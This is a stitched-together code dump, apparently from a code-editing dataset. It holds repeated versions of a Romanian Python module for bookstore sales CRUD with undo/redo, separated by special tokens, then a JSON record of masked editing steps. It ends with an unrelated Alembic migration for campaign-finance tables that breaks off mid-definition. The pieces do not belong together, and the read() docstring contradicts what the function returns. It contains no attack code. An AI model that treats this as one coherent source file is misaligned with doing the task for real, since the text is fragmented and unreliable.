undo_list.append(lst_vanzare)
redo_list.clear()
return new_vanzari
<|reserved_special_token_1|>
from Domain.Librarie import vanzare_obiect, get_id, get_titlu, get_gen, get_pret, get_tip_reducere
def inverse_create(lst_vanzari, id_carte):
new_vanzari = []
for carte in lst_vanzari:
if get_id(carte) != id_carte:
new_vanzari.append(carte)
return new_vanzari
def get_by_id(id, lista):
"""
ia vanzarea cu id-ul dat dintr-o lista
:param id: id-ul vanzarii - string
:param lista: lista de vanzari
:return: vanzarea cu id-ul dat sau None daca nu exista in lista
"""
for vanzare in lista:
if get_id(vanzare) == id:
return vanzare
return None
def create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,
undo_list: list, redo_list: list):
"""
Creeaza o vanzare
:param lst_vanzari:lista de vanzari
:param id_vanzare: id-ul vanzarii
:param titlu: titlul cartii din vanzare
:param gen: genul cartii din vanzare
:param pret: pretul vanzarii
:param tip_reducere: tipul de reducere
:param undo_list: lista de sters
:param redo_list: lista de adaugat
:return: returneaza o vanzare cu un id unic si detaliile ei
"""
new_list = ['None', 'Gold', 'Silver']
if tip_reducere not in new_list:
raise TypeError('Tip reducere necunoscut.')
if get_by_id(id_vanzare, lst_vanzari) is not None:
raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')
vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere
)
undo_list.append(lst_vanzari)
redo_list.clear()
return lst_vanzari + [vanzare_obiecte]
def read(lst_vanzari, id_carte: int=None):
"""
Citeste o vanzare din "baza de date".
:param lst_vanzari: lista de vanzari
:param id_vanzare: id-ul vanzarii.
:return: cartea cu id-ul id_carte sau lista cu toate vanzarile, daca id_carte=None
"""
cartea_cu_id = None
for cartea in lst_vanzari:
if get_id(cartea) == id_carte:
cartea_cu_id = cartea
if cartea_cu_id:
return cartea_cu_id
return None
def update(lst_vanzari, new_vanzare, undo_list: list, redo_list: list):
"""
Actualizeaza o vanzare.
:param lst_vanzari: lista de vaznari
:param new_vanzare: vanzarea care se va actualiza - id-ul trebuie sa fie unul existent.
:param undo_list: lista cu vanzarea care tebuie stearsa
:param redo_list: lista cu vanzarea care trebuie adaugata
:return: o lista cu vanzari actualizata
"""
if read(lst_vanzari, get_id(new_vanzare)) is None:
raise ValueError(
f'Nu xista o vanzare cu id-ul {get_id(new_vanzare)} pe care sa o actualizam.'
)
new_vanzari = []
for vanzare in lst_vanzari:
if get_id(vanzare) != get_id(new_vanzare):
new_vanzari.append(vanzare)
else:
new_vanzari.append(new_vanzare)
undo_list.append(lst_vanzari)
redo_list.clear()
return new_vanzari
def delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):
"""
:param lst_vanzare: lista de vanzari
:param id_carte: id-ul cartii din vanzare
:param undo_list: lista cu vanzarea care trebuie stearsa
:param redo_list: lista cu vanzarea care trebuie adaugata
:return: o lista de vanzari fara cartea cu id-ul id_carte.
"""
if read(lst_vanzare, id_carte) is None:
raise ValueError(
f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')
new_vanzari = []
for carte in lst_vanzare:
if get_id(carte) != id_carte:
new_vanzari.append(carte)
undo_list.append(lst_vanzare)
redo_list.clear()
return new_vanzari
<|reserved_special_token_1|>
from Domain.Librarie import vanzare_obiect, get_id, get_titlu, get_gen, get_pret, get_tip_reducere
def inverse_create(lst_vanzari, id_carte):
new_vanzari = []
for carte in lst_vanzari:
if get_id(carte) != id_carte:
new_vanzari.append(carte)
return new_vanzari
def get_by_id(id, lista):
'''
ia vanzarea cu id-ul dat dintr-o lista
:param id: id-ul vanzarii - string
:param lista: lista de vanzari
:return: vanzarea cu id-ul dat sau None daca nu exista in lista
'''
for vanzare in lista:
if get_id(vanzare) == id:
return vanzare
return None
def create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere, undo_list: list, redo_list: list):
'''
Creeaza o vanzare
:param lst_vanzari:lista de vanzari
:param id_vanzare: id-ul vanzarii
:param titlu: titlul cartii din vanzare
:param gen: genul cartii din vanzare
:param pret: pretul vanzarii
:param tip_reducere: tipul de reducere
:param undo_list: lista de sters
:param redo_list: lista de adaugat
:return: returneaza o vanzare cu un id unic si detaliile ei
'''
new_list=['None', 'Gold', 'Silver']
if tip_reducere not in new_list:
raise TypeError('Tip reducere necunoscut.')
if get_by_id(id_vanzare, lst_vanzari) is not None:
raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')
vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere)
#lst_vanzari.append(vanzare_obiecte)
undo_list.append(lst_vanzari)
redo_list.clear()
#return [id_vanzare, titlu, gen, pret, tip_reducere]
return lst_vanzari + [vanzare_obiecte]
def read(lst_vanzari, id_carte: int=None):
"""
Citeste o vanzare din "baza de date".
:param lst_vanzari: lista de vanzari
:param id_vanzare: id-ul vanzarii.
:return: cartea cu id-ul id_carte sau lista cu toate vanzarile, daca id_carte=None
"""
cartea_cu_id = None
for cartea in lst_vanzari:
if get_id(cartea) == id_carte:
cartea_cu_id = cartea
if cartea_cu_id:
return cartea_cu_id
return None
def update(lst_vanzari, new_vanzare, undo_list: list, redo_list: list):
"""
Actualizeaza o vanzare.
:param lst_vanzari: lista de vaznari
:param new_vanzare: vanzarea care se va actualiza - id-ul trebuie sa fie unul existent.
:param undo_list: lista cu vanzarea care tebuie stearsa
:param redo_list: lista cu vanzarea care trebuie adaugata
:return: o lista cu vanzari actualizata
"""
if read(lst_vanzari, get_id(new_vanzare)) is None:
raise ValueError(f'Nu xista o vanzare cu id-ul {get_id(new_vanzare)} pe care sa o actualizam.')
# lst_carti=[c1:(1,Mobidic), c2:(2,Hansel si Gretel)], cartea=(2, Scufita Rosie)
new_vanzari = []
for vanzare in lst_vanzari:
if get_id(vanzare) != get_id(new_vanzare):
new_vanzari.append(vanzare)
else:
new_vanzari.append(new_vanzare)
undo_list.append(lst_vanzari)
redo_list.clear()
return new_vanzari
def delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):
"""
:param lst_vanzare: lista de vanzari
:param id_carte: id-ul cartii din vanzare
:param undo_list: lista cu vanzarea care trebuie stearsa
:param redo_list: lista cu vanzarea care trebuie adaugata
:return: o lista de vanzari fara cartea cu id-ul id_carte.
"""
if read(lst_vanzare, id_carte) is None:
raise ValueError(f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')
new_vanzari = []
for carte in lst_vanzare:
if get_id(carte) != id_carte:
new_vanzari.append(carte)
undo_list.append(lst_vanzare)
redo_list.clear()
return new_vanzari
|
flexible
|
{
"blob_id": "498d07421d848332ad528ef3d3910d70312b5f55",
"index": 2606,
"step-1": "<mask token>\n\n\ndef get_by_id(id, lista):\n \"\"\"\n ia vanzarea cu id-ul dat dintr-o lista\n :param id: id-ul vanzarii - string\n :param lista: lista de vanzari\n :return: vanzarea cu id-ul dat sau None daca nu exista in lista\n \"\"\"\n for vanzare in lista:\n if get_id(vanzare) == id:\n return vanzare\n return None\n\n\ndef create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,\n undo_list: list, redo_list: list):\n \"\"\"\n Creeaza o vanzare\n :param lst_vanzari:lista de vanzari\n :param id_vanzare: id-ul vanzarii\n :param titlu: titlul cartii din vanzare\n :param gen: genul cartii din vanzare\n :param pret: pretul vanzarii\n :param tip_reducere: tipul de reducere\n :param undo_list: lista de sters\n :param redo_list: lista de adaugat\n :return: returneaza o vanzare cu un id unic si detaliile ei\n \"\"\"\n new_list = ['None', 'Gold', 'Silver']\n if tip_reducere not in new_list:\n raise TypeError('Tip reducere necunoscut.')\n if get_by_id(id_vanzare, lst_vanzari) is not None:\n raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')\n vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere\n )\n undo_list.append(lst_vanzari)\n redo_list.clear()\n return lst_vanzari + [vanzare_obiecte]\n\n\ndef read(lst_vanzari, id_carte: int=None):\n \"\"\"\n Citeste o vanzare din \"baza de date\".\n :param lst_vanzari: lista de vanzari\n :param id_vanzare: id-ul vanzarii.\n :return: cartea cu id-ul id_carte sau lista cu toate vanzarile, daca id_carte=None\n \"\"\"\n cartea_cu_id = None\n for cartea in lst_vanzari:\n if get_id(cartea) == id_carte:\n cartea_cu_id = cartea\n if cartea_cu_id:\n return cartea_cu_id\n return None\n\n\n<mask token>\n\n\ndef delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):\n \"\"\"\n :param lst_vanzare: lista de vanzari\n :param id_carte: id-ul cartii din vanzare\n :param undo_list: lista cu vanzarea care trebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie adaugata\n :return: o lista de vanzari fara cartea cu id-ul id_carte.\n \"\"\"\n if read(lst_vanzare, id_carte) is None:\n raise ValueError(\n f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')\n new_vanzari = []\n for carte in lst_vanzare:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n undo_list.append(lst_vanzare)\n redo_list.clear()\n return new_vanzari\n",
"step-2": "<mask token>\n\n\ndef inverse_create(lst_vanzari, id_carte):\n new_vanzari = []\n for carte in lst_vanzari:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n return new_vanzari\n\n\ndef get_by_id(id, lista):\n \"\"\"\n ia vanzarea cu id-ul dat dintr-o lista\n :param id: id-ul vanzarii - string\n :param lista: lista de vanzari\n :return: vanzarea cu id-ul dat sau None daca nu exista in lista\n \"\"\"\n for vanzare in lista:\n if get_id(vanzare) == id:\n return vanzare\n return None\n\n\ndef create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,\n undo_list: list, redo_list: list):\n \"\"\"\n Creeaza o vanzare\n :param lst_vanzari:lista de vanzari\n :param id_vanzare: id-ul vanzarii\n :param titlu: titlul cartii din vanzare\n :param gen: genul cartii din vanzare\n :param pret: pretul vanzarii\n :param tip_reducere: tipul de reducere\n :param undo_list: lista de sters\n :param redo_list: lista de adaugat\n :return: returneaza o vanzare cu un id unic si detaliile ei\n \"\"\"\n new_list = ['None', 'Gold', 'Silver']\n if tip_reducere not in new_list:\n raise TypeError('Tip reducere necunoscut.')\n if get_by_id(id_vanzare, lst_vanzari) is not None:\n raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')\n vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere\n )\n undo_list.append(lst_vanzari)\n redo_list.clear()\n return lst_vanzari + [vanzare_obiecte]\n\n\ndef read(lst_vanzari, id_carte: int=None):\n \"\"\"\n Citeste o vanzare din \"baza de date\".\n :param lst_vanzari: lista de vanzari\n :param id_vanzare: id-ul vanzarii.\n :return: cartea cu id-ul id_carte sau lista cu toate vanzarile, daca id_carte=None\n \"\"\"\n cartea_cu_id = None\n for cartea in lst_vanzari:\n if get_id(cartea) == id_carte:\n cartea_cu_id = cartea\n if cartea_cu_id:\n return cartea_cu_id\n return None\n\n\n<mask token>\n\n\ndef delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):\n \"\"\"\n :param lst_vanzare: lista de vanzari\n :param id_carte: id-ul cartii din vanzare\n :param undo_list: lista cu vanzarea care trebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie adaugata\n :return: o lista de vanzari fara cartea cu id-ul id_carte.\n \"\"\"\n if read(lst_vanzare, id_carte) is None:\n raise ValueError(\n f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')\n new_vanzari = []\n for carte in lst_vanzare:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n undo_list.append(lst_vanzare)\n redo_list.clear()\n return new_vanzari\n",
"step-3": "<mask token>\n\n\ndef inverse_create(lst_vanzari, id_carte):\n new_vanzari = []\n for carte in lst_vanzari:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n return new_vanzari\n\n\ndef get_by_id(id, lista):\n \"\"\"\n ia vanzarea cu id-ul dat dintr-o lista\n :param id: id-ul vanzarii - string\n :param lista: lista de vanzari\n :return: vanzarea cu id-ul dat sau None daca nu exista in lista\n \"\"\"\n for vanzare in lista:\n if get_id(vanzare) == id:\n return vanzare\n return None\n\n\ndef create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,\n undo_list: list, redo_list: list):\n \"\"\"\n Creeaza o vanzare\n :param lst_vanzari:lista de vanzari\n :param id_vanzare: id-ul vanzarii\n :param titlu: titlul cartii din vanzare\n :param gen: genul cartii din vanzare\n :param pret: pretul vanzarii\n :param tip_reducere: tipul de reducere\n :param undo_list: lista de sters\n :param redo_list: lista de adaugat\n :return: returneaza o vanzare cu un id unic si detaliile ei\n \"\"\"\n new_list = ['None', 'Gold', 'Silver']\n if tip_reducere not in new_list:\n raise TypeError('Tip reducere necunoscut.')\n if get_by_id(id_vanzare, lst_vanzari) is not None:\n raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')\n vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere\n )\n undo_list.append(lst_vanzari)\n redo_list.clear()\n return lst_vanzari + [vanzare_obiecte]\n\n\ndef read(lst_vanzari, id_carte: int=None):\n \"\"\"\n Citeste o vanzare din \"baza de date\".\n :param lst_vanzari: lista de vanzari\n :param id_vanzare: id-ul vanzarii.\n :return: cartea cu id-ul id_carte sau lista cu toate vanzarile, daca id_carte=None\n \"\"\"\n cartea_cu_id = None\n for cartea in lst_vanzari:\n if get_id(cartea) == id_carte:\n cartea_cu_id = cartea\n if cartea_cu_id:\n return cartea_cu_id\n return None\n\n\ndef update(lst_vanzari, new_vanzare, undo_list: list, redo_list: list):\n \"\"\"\n Actualizeaza o vanzare.\n :param lst_vanzari: lista de vaznari\n :param new_vanzare: vanzarea care se va actualiza - id-ul trebuie sa fie unul existent.\n :param undo_list: lista cu vanzarea care tebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie adaugata\n :return: o lista cu vanzari actualizata\n \"\"\"\n if read(lst_vanzari, get_id(new_vanzare)) is None:\n raise ValueError(\n f'Nu xista o vanzare cu id-ul {get_id(new_vanzare)} pe care sa o actualizam.'\n )\n new_vanzari = []\n for vanzare in lst_vanzari:\n if get_id(vanzare) != get_id(new_vanzare):\n new_vanzari.append(vanzare)\n else:\n new_vanzari.append(new_vanzare)\n undo_list.append(lst_vanzari)\n redo_list.clear()\n return new_vanzari\n\n\ndef delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):\n \"\"\"\n :param lst_vanzare: lista de vanzari\n :param id_carte: id-ul cartii din vanzare\n :param undo_list: lista cu vanzarea care trebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie adaugata\n :return: o lista de vanzari fara cartea cu id-ul id_carte.\n \"\"\"\n if read(lst_vanzare, id_carte) is None:\n raise ValueError(\n f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')\n new_vanzari = []\n for carte in lst_vanzare:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n undo_list.append(lst_vanzare)\n redo_list.clear()\n return new_vanzari\n",
"step-4": "from Domain.Librarie import vanzare_obiect, get_id, get_titlu, get_gen, get_pret, get_tip_reducere\n\n\ndef inverse_create(lst_vanzari, id_carte):\n new_vanzari = []\n for carte in lst_vanzari:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n return new_vanzari\n\n\ndef get_by_id(id, lista):\n \"\"\"\n ia vanzarea cu id-ul dat dintr-o lista\n :param id: id-ul vanzarii - string\n :param lista: lista de vanzari\n :return: vanzarea cu id-ul dat sau None daca nu exista in lista\n \"\"\"\n for vanzare in lista:\n if get_id(vanzare) == id:\n return vanzare\n return None\n\n\ndef create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,\n undo_list: list, redo_list: list):\n \"\"\"\n Creeaza o vanzare\n :param lst_vanzari:lista de vanzari\n :param id_vanzare: id-ul vanzarii\n :param titlu: titlul cartii din vanzare\n :param gen: genul cartii din vanzare\n :param pret: pretul vanzarii\n :param tip_reducere: tipul de reducere\n :param undo_list: lista de sters\n :param redo_list: lista de adaugat\n :return: returneaza o vanzare cu un id unic si detaliile ei\n \"\"\"\n new_list = ['None', 'Gold', 'Silver']\n if tip_reducere not in new_list:\n raise TypeError('Tip reducere necunoscut.')\n if get_by_id(id_vanzare, lst_vanzari) is not None:\n raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')\n vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere\n )\n undo_list.append(lst_vanzari)\n redo_list.clear()\n return lst_vanzari + [vanzare_obiecte]\n\n\ndef read(lst_vanzari, id_carte: int=None):\n \"\"\"\n Citeste o vanzare din \"baza de date\".\n :param lst_vanzari: lista de vanzari\n :param id_vanzare: id-ul vanzarii.\n :return: cartea cu id-ul id_carte sau lista cu toate vanzarile, daca id_carte=None\n \"\"\"\n cartea_cu_id = None\n for cartea in lst_vanzari:\n if get_id(cartea) == id_carte:\n cartea_cu_id = cartea\n if cartea_cu_id:\n return cartea_cu_id\n return None\n\n\ndef update(lst_vanzari, new_vanzare, undo_list: list, redo_list: list):\n \"\"\"\n Actualizeaza o vanzare.\n :param lst_vanzari: lista de vaznari\n :param new_vanzare: vanzarea care se va actualiza - id-ul trebuie sa fie unul existent.\n :param undo_list: lista cu vanzarea care tebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie adaugata\n :return: o lista cu vanzari actualizata\n \"\"\"\n if read(lst_vanzari, get_id(new_vanzare)) is None:\n raise ValueError(\n f'Nu xista o vanzare cu id-ul {get_id(new_vanzare)} pe care sa o actualizam.'\n )\n new_vanzari = []\n for vanzare in lst_vanzari:\n if get_id(vanzare) != get_id(new_vanzare):\n new_vanzari.append(vanzare)\n else:\n new_vanzari.append(new_vanzare)\n undo_list.append(lst_vanzari)\n redo_list.clear()\n return new_vanzari\n\n\ndef delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):\n \"\"\"\n :param lst_vanzare: lista de vanzari\n :param id_carte: id-ul cartii din vanzare\n :param undo_list: lista cu vanzarea care trebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie adaugata\n :return: o lista de vanzari fara cartea cu id-ul id_carte.\n \"\"\"\n if read(lst_vanzare, id_carte) is None:\n raise ValueError(\n f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')\n new_vanzari = []\n for carte in lst_vanzare:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n undo_list.append(lst_vanzare)\n redo_list.clear()\n return new_vanzari\n",
"step-5": "from Domain.Librarie import vanzare_obiect, get_id, get_titlu, get_gen, get_pret, get_tip_reducere\n\ndef inverse_create(lst_vanzari, id_carte):\n new_vanzari = []\n for carte in lst_vanzari:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n return new_vanzari\n\n\ndef get_by_id(id, lista):\n '''\n ia vanzarea cu id-ul dat dintr-o lista\n :param id: id-ul vanzarii - string\n :param lista: lista de vanzari\n :return: vanzarea cu id-ul dat sau None daca nu exista in lista\n '''\n for vanzare in lista:\n if get_id(vanzare) == id:\n return vanzare\n return None\n\n\ndef create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere, undo_list: list, redo_list: list):\n '''\n Creeaza o vanzare\n :param lst_vanzari:lista de vanzari\n :param id_vanzare: id-ul vanzarii\n :param titlu: titlul cartii din vanzare\n :param gen: genul cartii din vanzare\n :param pret: pretul vanzarii\n :param tip_reducere: tipul de reducere\n :param undo_list: lista de sters\n :param redo_list: lista de adaugat\n :return: returneaza o vanzare cu un id unic si detaliile ei\n '''\n new_list=['None', 'Gold', 'Silver']\n if tip_reducere not in new_list:\n raise TypeError('Tip reducere necunoscut.')\n if get_by_id(id_vanzare, lst_vanzari) is not None:\n raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')\n\n vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere)\n #lst_vanzari.append(vanzare_obiecte)\n undo_list.append(lst_vanzari)\n redo_list.clear()\n #return [id_vanzare, titlu, gen, pret, tip_reducere]\n return lst_vanzari + [vanzare_obiecte]\n\n\n\ndef read(lst_vanzari, id_carte: int=None):\n \"\"\"\n Citeste o vanzare din \"baza de date\".\n :param lst_vanzari: lista de vanzari\n :param id_vanzare: id-ul vanzarii.\n :return: cartea cu id-ul id_carte sau lista cu toate vanzarile, daca id_carte=None\n \"\"\"\n cartea_cu_id = None\n for cartea in lst_vanzari:\n if get_id(cartea) == id_carte:\n cartea_cu_id = cartea\n\n if cartea_cu_id:\n return cartea_cu_id\n return None\n\n\ndef update(lst_vanzari, new_vanzare, undo_list: list, redo_list: list):\n \"\"\"\n Actualizeaza o vanzare.\n :param lst_vanzari: lista de vaznari\n :param new_vanzare: vanzarea care se va actualiza - id-ul trebuie sa fie unul existent.\n :param undo_list: lista cu vanzarea care tebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie adaugata\n :return: o lista cu vanzari actualizata\n \"\"\"\n\n if read(lst_vanzari, get_id(new_vanzare)) is None:\n raise ValueError(f'Nu xista o vanzare cu id-ul {get_id(new_vanzare)} pe care sa o actualizam.')\n\n # lst_carti=[c1:(1,Mobidic), c2:(2,Hansel si Gretel)], cartea=(2, Scufita Rosie)\n new_vanzari = []\n for vanzare in lst_vanzari:\n if get_id(vanzare) != get_id(new_vanzare):\n new_vanzari.append(vanzare)\n else:\n new_vanzari.append(new_vanzare)\n undo_list.append(lst_vanzari)\n redo_list.clear()\n return new_vanzari\n\n\ndef delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):\n \"\"\"\n :param lst_vanzare: lista de vanzari\n :param id_carte: id-ul cartii din vanzare\n :param undo_list: lista cu vanzarea care trebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie adaugata\n :return: o lista de vanzari fara cartea cu id-ul id_carte.\n \"\"\"\n if read(lst_vanzare, id_carte) is None:\n raise ValueError(f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')\n\n new_vanzari = []\n for carte in lst_vanzare:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n undo_list.append(lst_vanzare)\n redo_list.clear()\n return new_vanzari\n\n\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
"""Initial migration
Revision ID: 1f2296edbc75
Revises: 7417382a3f1
Create Date: 2014-01-19 23:04:58.877817
"""
# revision identifiers, used by Alembic.
revision = '1f2296edbc75'
down_revision = '7417382a3f1'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
from sqlalchemy import func
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table(u'consultant',
sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('name', sa.Text(), nullable=False),
sa.Column('address', sa.Text(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table(u'service',
sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('name', sa.Text(), nullable=False),
sa.Column('description', sa.Text(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table(u'ballot_type',
sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('name', sa.Text(), nullable=False),
sa.Column('percent_required', sa.Numeric(precision=2, scale=2), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table(u'employer',
sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('name', sa.Text(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table(u'tag',
sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('name', sa.Text(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table(u'election',
sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('date', sa.Date(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table(u'donor',
sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('first_name', sa.Text(), nullable=False),
sa.Column('last_name', sa.Text(), nullable=False),
sa.Column('address', sa.Text(), nullable=False),
sa.Column('latitude', sa.Float(), nullable=False),
sa.Column('longitude', sa.Float(), nullable=False),
sa.Column('employer_id', postgresql.UUID(), nullable=True),
sa.ForeignKeyConstraint(['employer_id'], [u'employer.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('first_name','last_name','latitude','longitude')
)
op.create_index('ix_donor_employer_id', 'donor', ['employer_id'], unique=False)
op.create_table(u'committee',
sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('name', sa.Text(), nullable=False),
sa.Column('filer_id', sa.Text(), nullable=True),
sa.Column('sponsor', sa.Text(), nullable=True),
sa.Column('election_id', postgresql.UUID(), nullable=True),
sa.ForeignKeyConstraint(['election_id'], [u'election.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index('ix_committee_election_id', 'committee', ['election_id'], unique=False)
op.create_table(u'ballot_measure',
sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('name', sa.Text(), nullable=True),
sa.Column('prop_id', sa.Text(), nullable=False),
sa.Column('description', sa.Text(), nullable=True),
sa.Column('num_yes', sa.Integer(), nullable=True),
sa.Column('num_no', sa.Integer(), nullable=True),
sa.Column('passed', sa.Boolean(), nullable=True),
sa.Column('ballot_type_id', postgresql.UUID(), nullable=True),
sa.Column('election_id', postgresql.UUID(), nullable=True),
sa.ForeignKeyConstraint(['ballot_type_id'], [u'ballot_type.id'], ),
sa.ForeignKeyConstraint(['election_id'], [u'election.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index('ix_ballot_measure_election_id', 'ballot_measure', ['election_id'], unique=False)
op.create_index('ix_ballot_measure_ballot_type_id', 'ballot_measure', ['ballot_type_id'], unique=False)
op.create_table(u'donation',
sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('amount', sa.Float(), nullable=False),
sa.Column('transaction_date', sa.Date(), nullable=False),
sa.Column('donor_id', postgresql.UUID(), nullable=False),
sa.Column('committee_id', postgresql.UUID(), nullable=False),
sa.ForeignKeyConstraint(['committee_id'], [u'committee.id'], ),
sa.ForeignKeyConstraint(['donor_id'], [u'donor.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index('ix_donation_committee_id', 'donation', ['committee_id'], unique=False)
op.create_index('ix_donation_donor_id', 'donation', ['donor_id'], unique=False)
op.create_table(u'contract',
sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('payment', sa.Float(), nullable=False),
sa.Column('consultant_id', postgresql.UUID(), nullable=False),
sa.Column('service_id', postgresql.UUID(), nullable=True),
sa.Column('description', sa.Text(), nullable=True),
sa.Column('committee_id', postgresql.UUID(), nullable=False),
sa.ForeignKeyConstraint(['committee_id'], [u'committee.id'], ),
sa.ForeignKeyConstraint(['consultant_id'], [u'consultant.id'], ),
sa.ForeignKeyConstraint(['service_id'], [u'service.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index('ix_contract_consultant_id', 'contract', ['consultant_id'], unique=False)
op.create_index('ix_contract_service_id', 'contract', ['service_id'], unique=False)
op.create_index('ix_contract_committee_id', 'contract', ['committee_id'], unique=False)
op.create_table(u'stance',
sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
sa.Column('voted_yes', sa.Boolean(), nullable=False),
sa.Column('committee_id', postgresql.UUID(), nullable=False),
sa.Column('ballot_measure_id', postgresql.UUID(), nullable=False),
sa.ForeignKeyConstraint(['ballot_measure_id'], [u'ballot_measure.id'], ),
sa.ForeignKeyConstraint(['committee_id'], [u'committee.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('committee_id','ballot_measure_id')
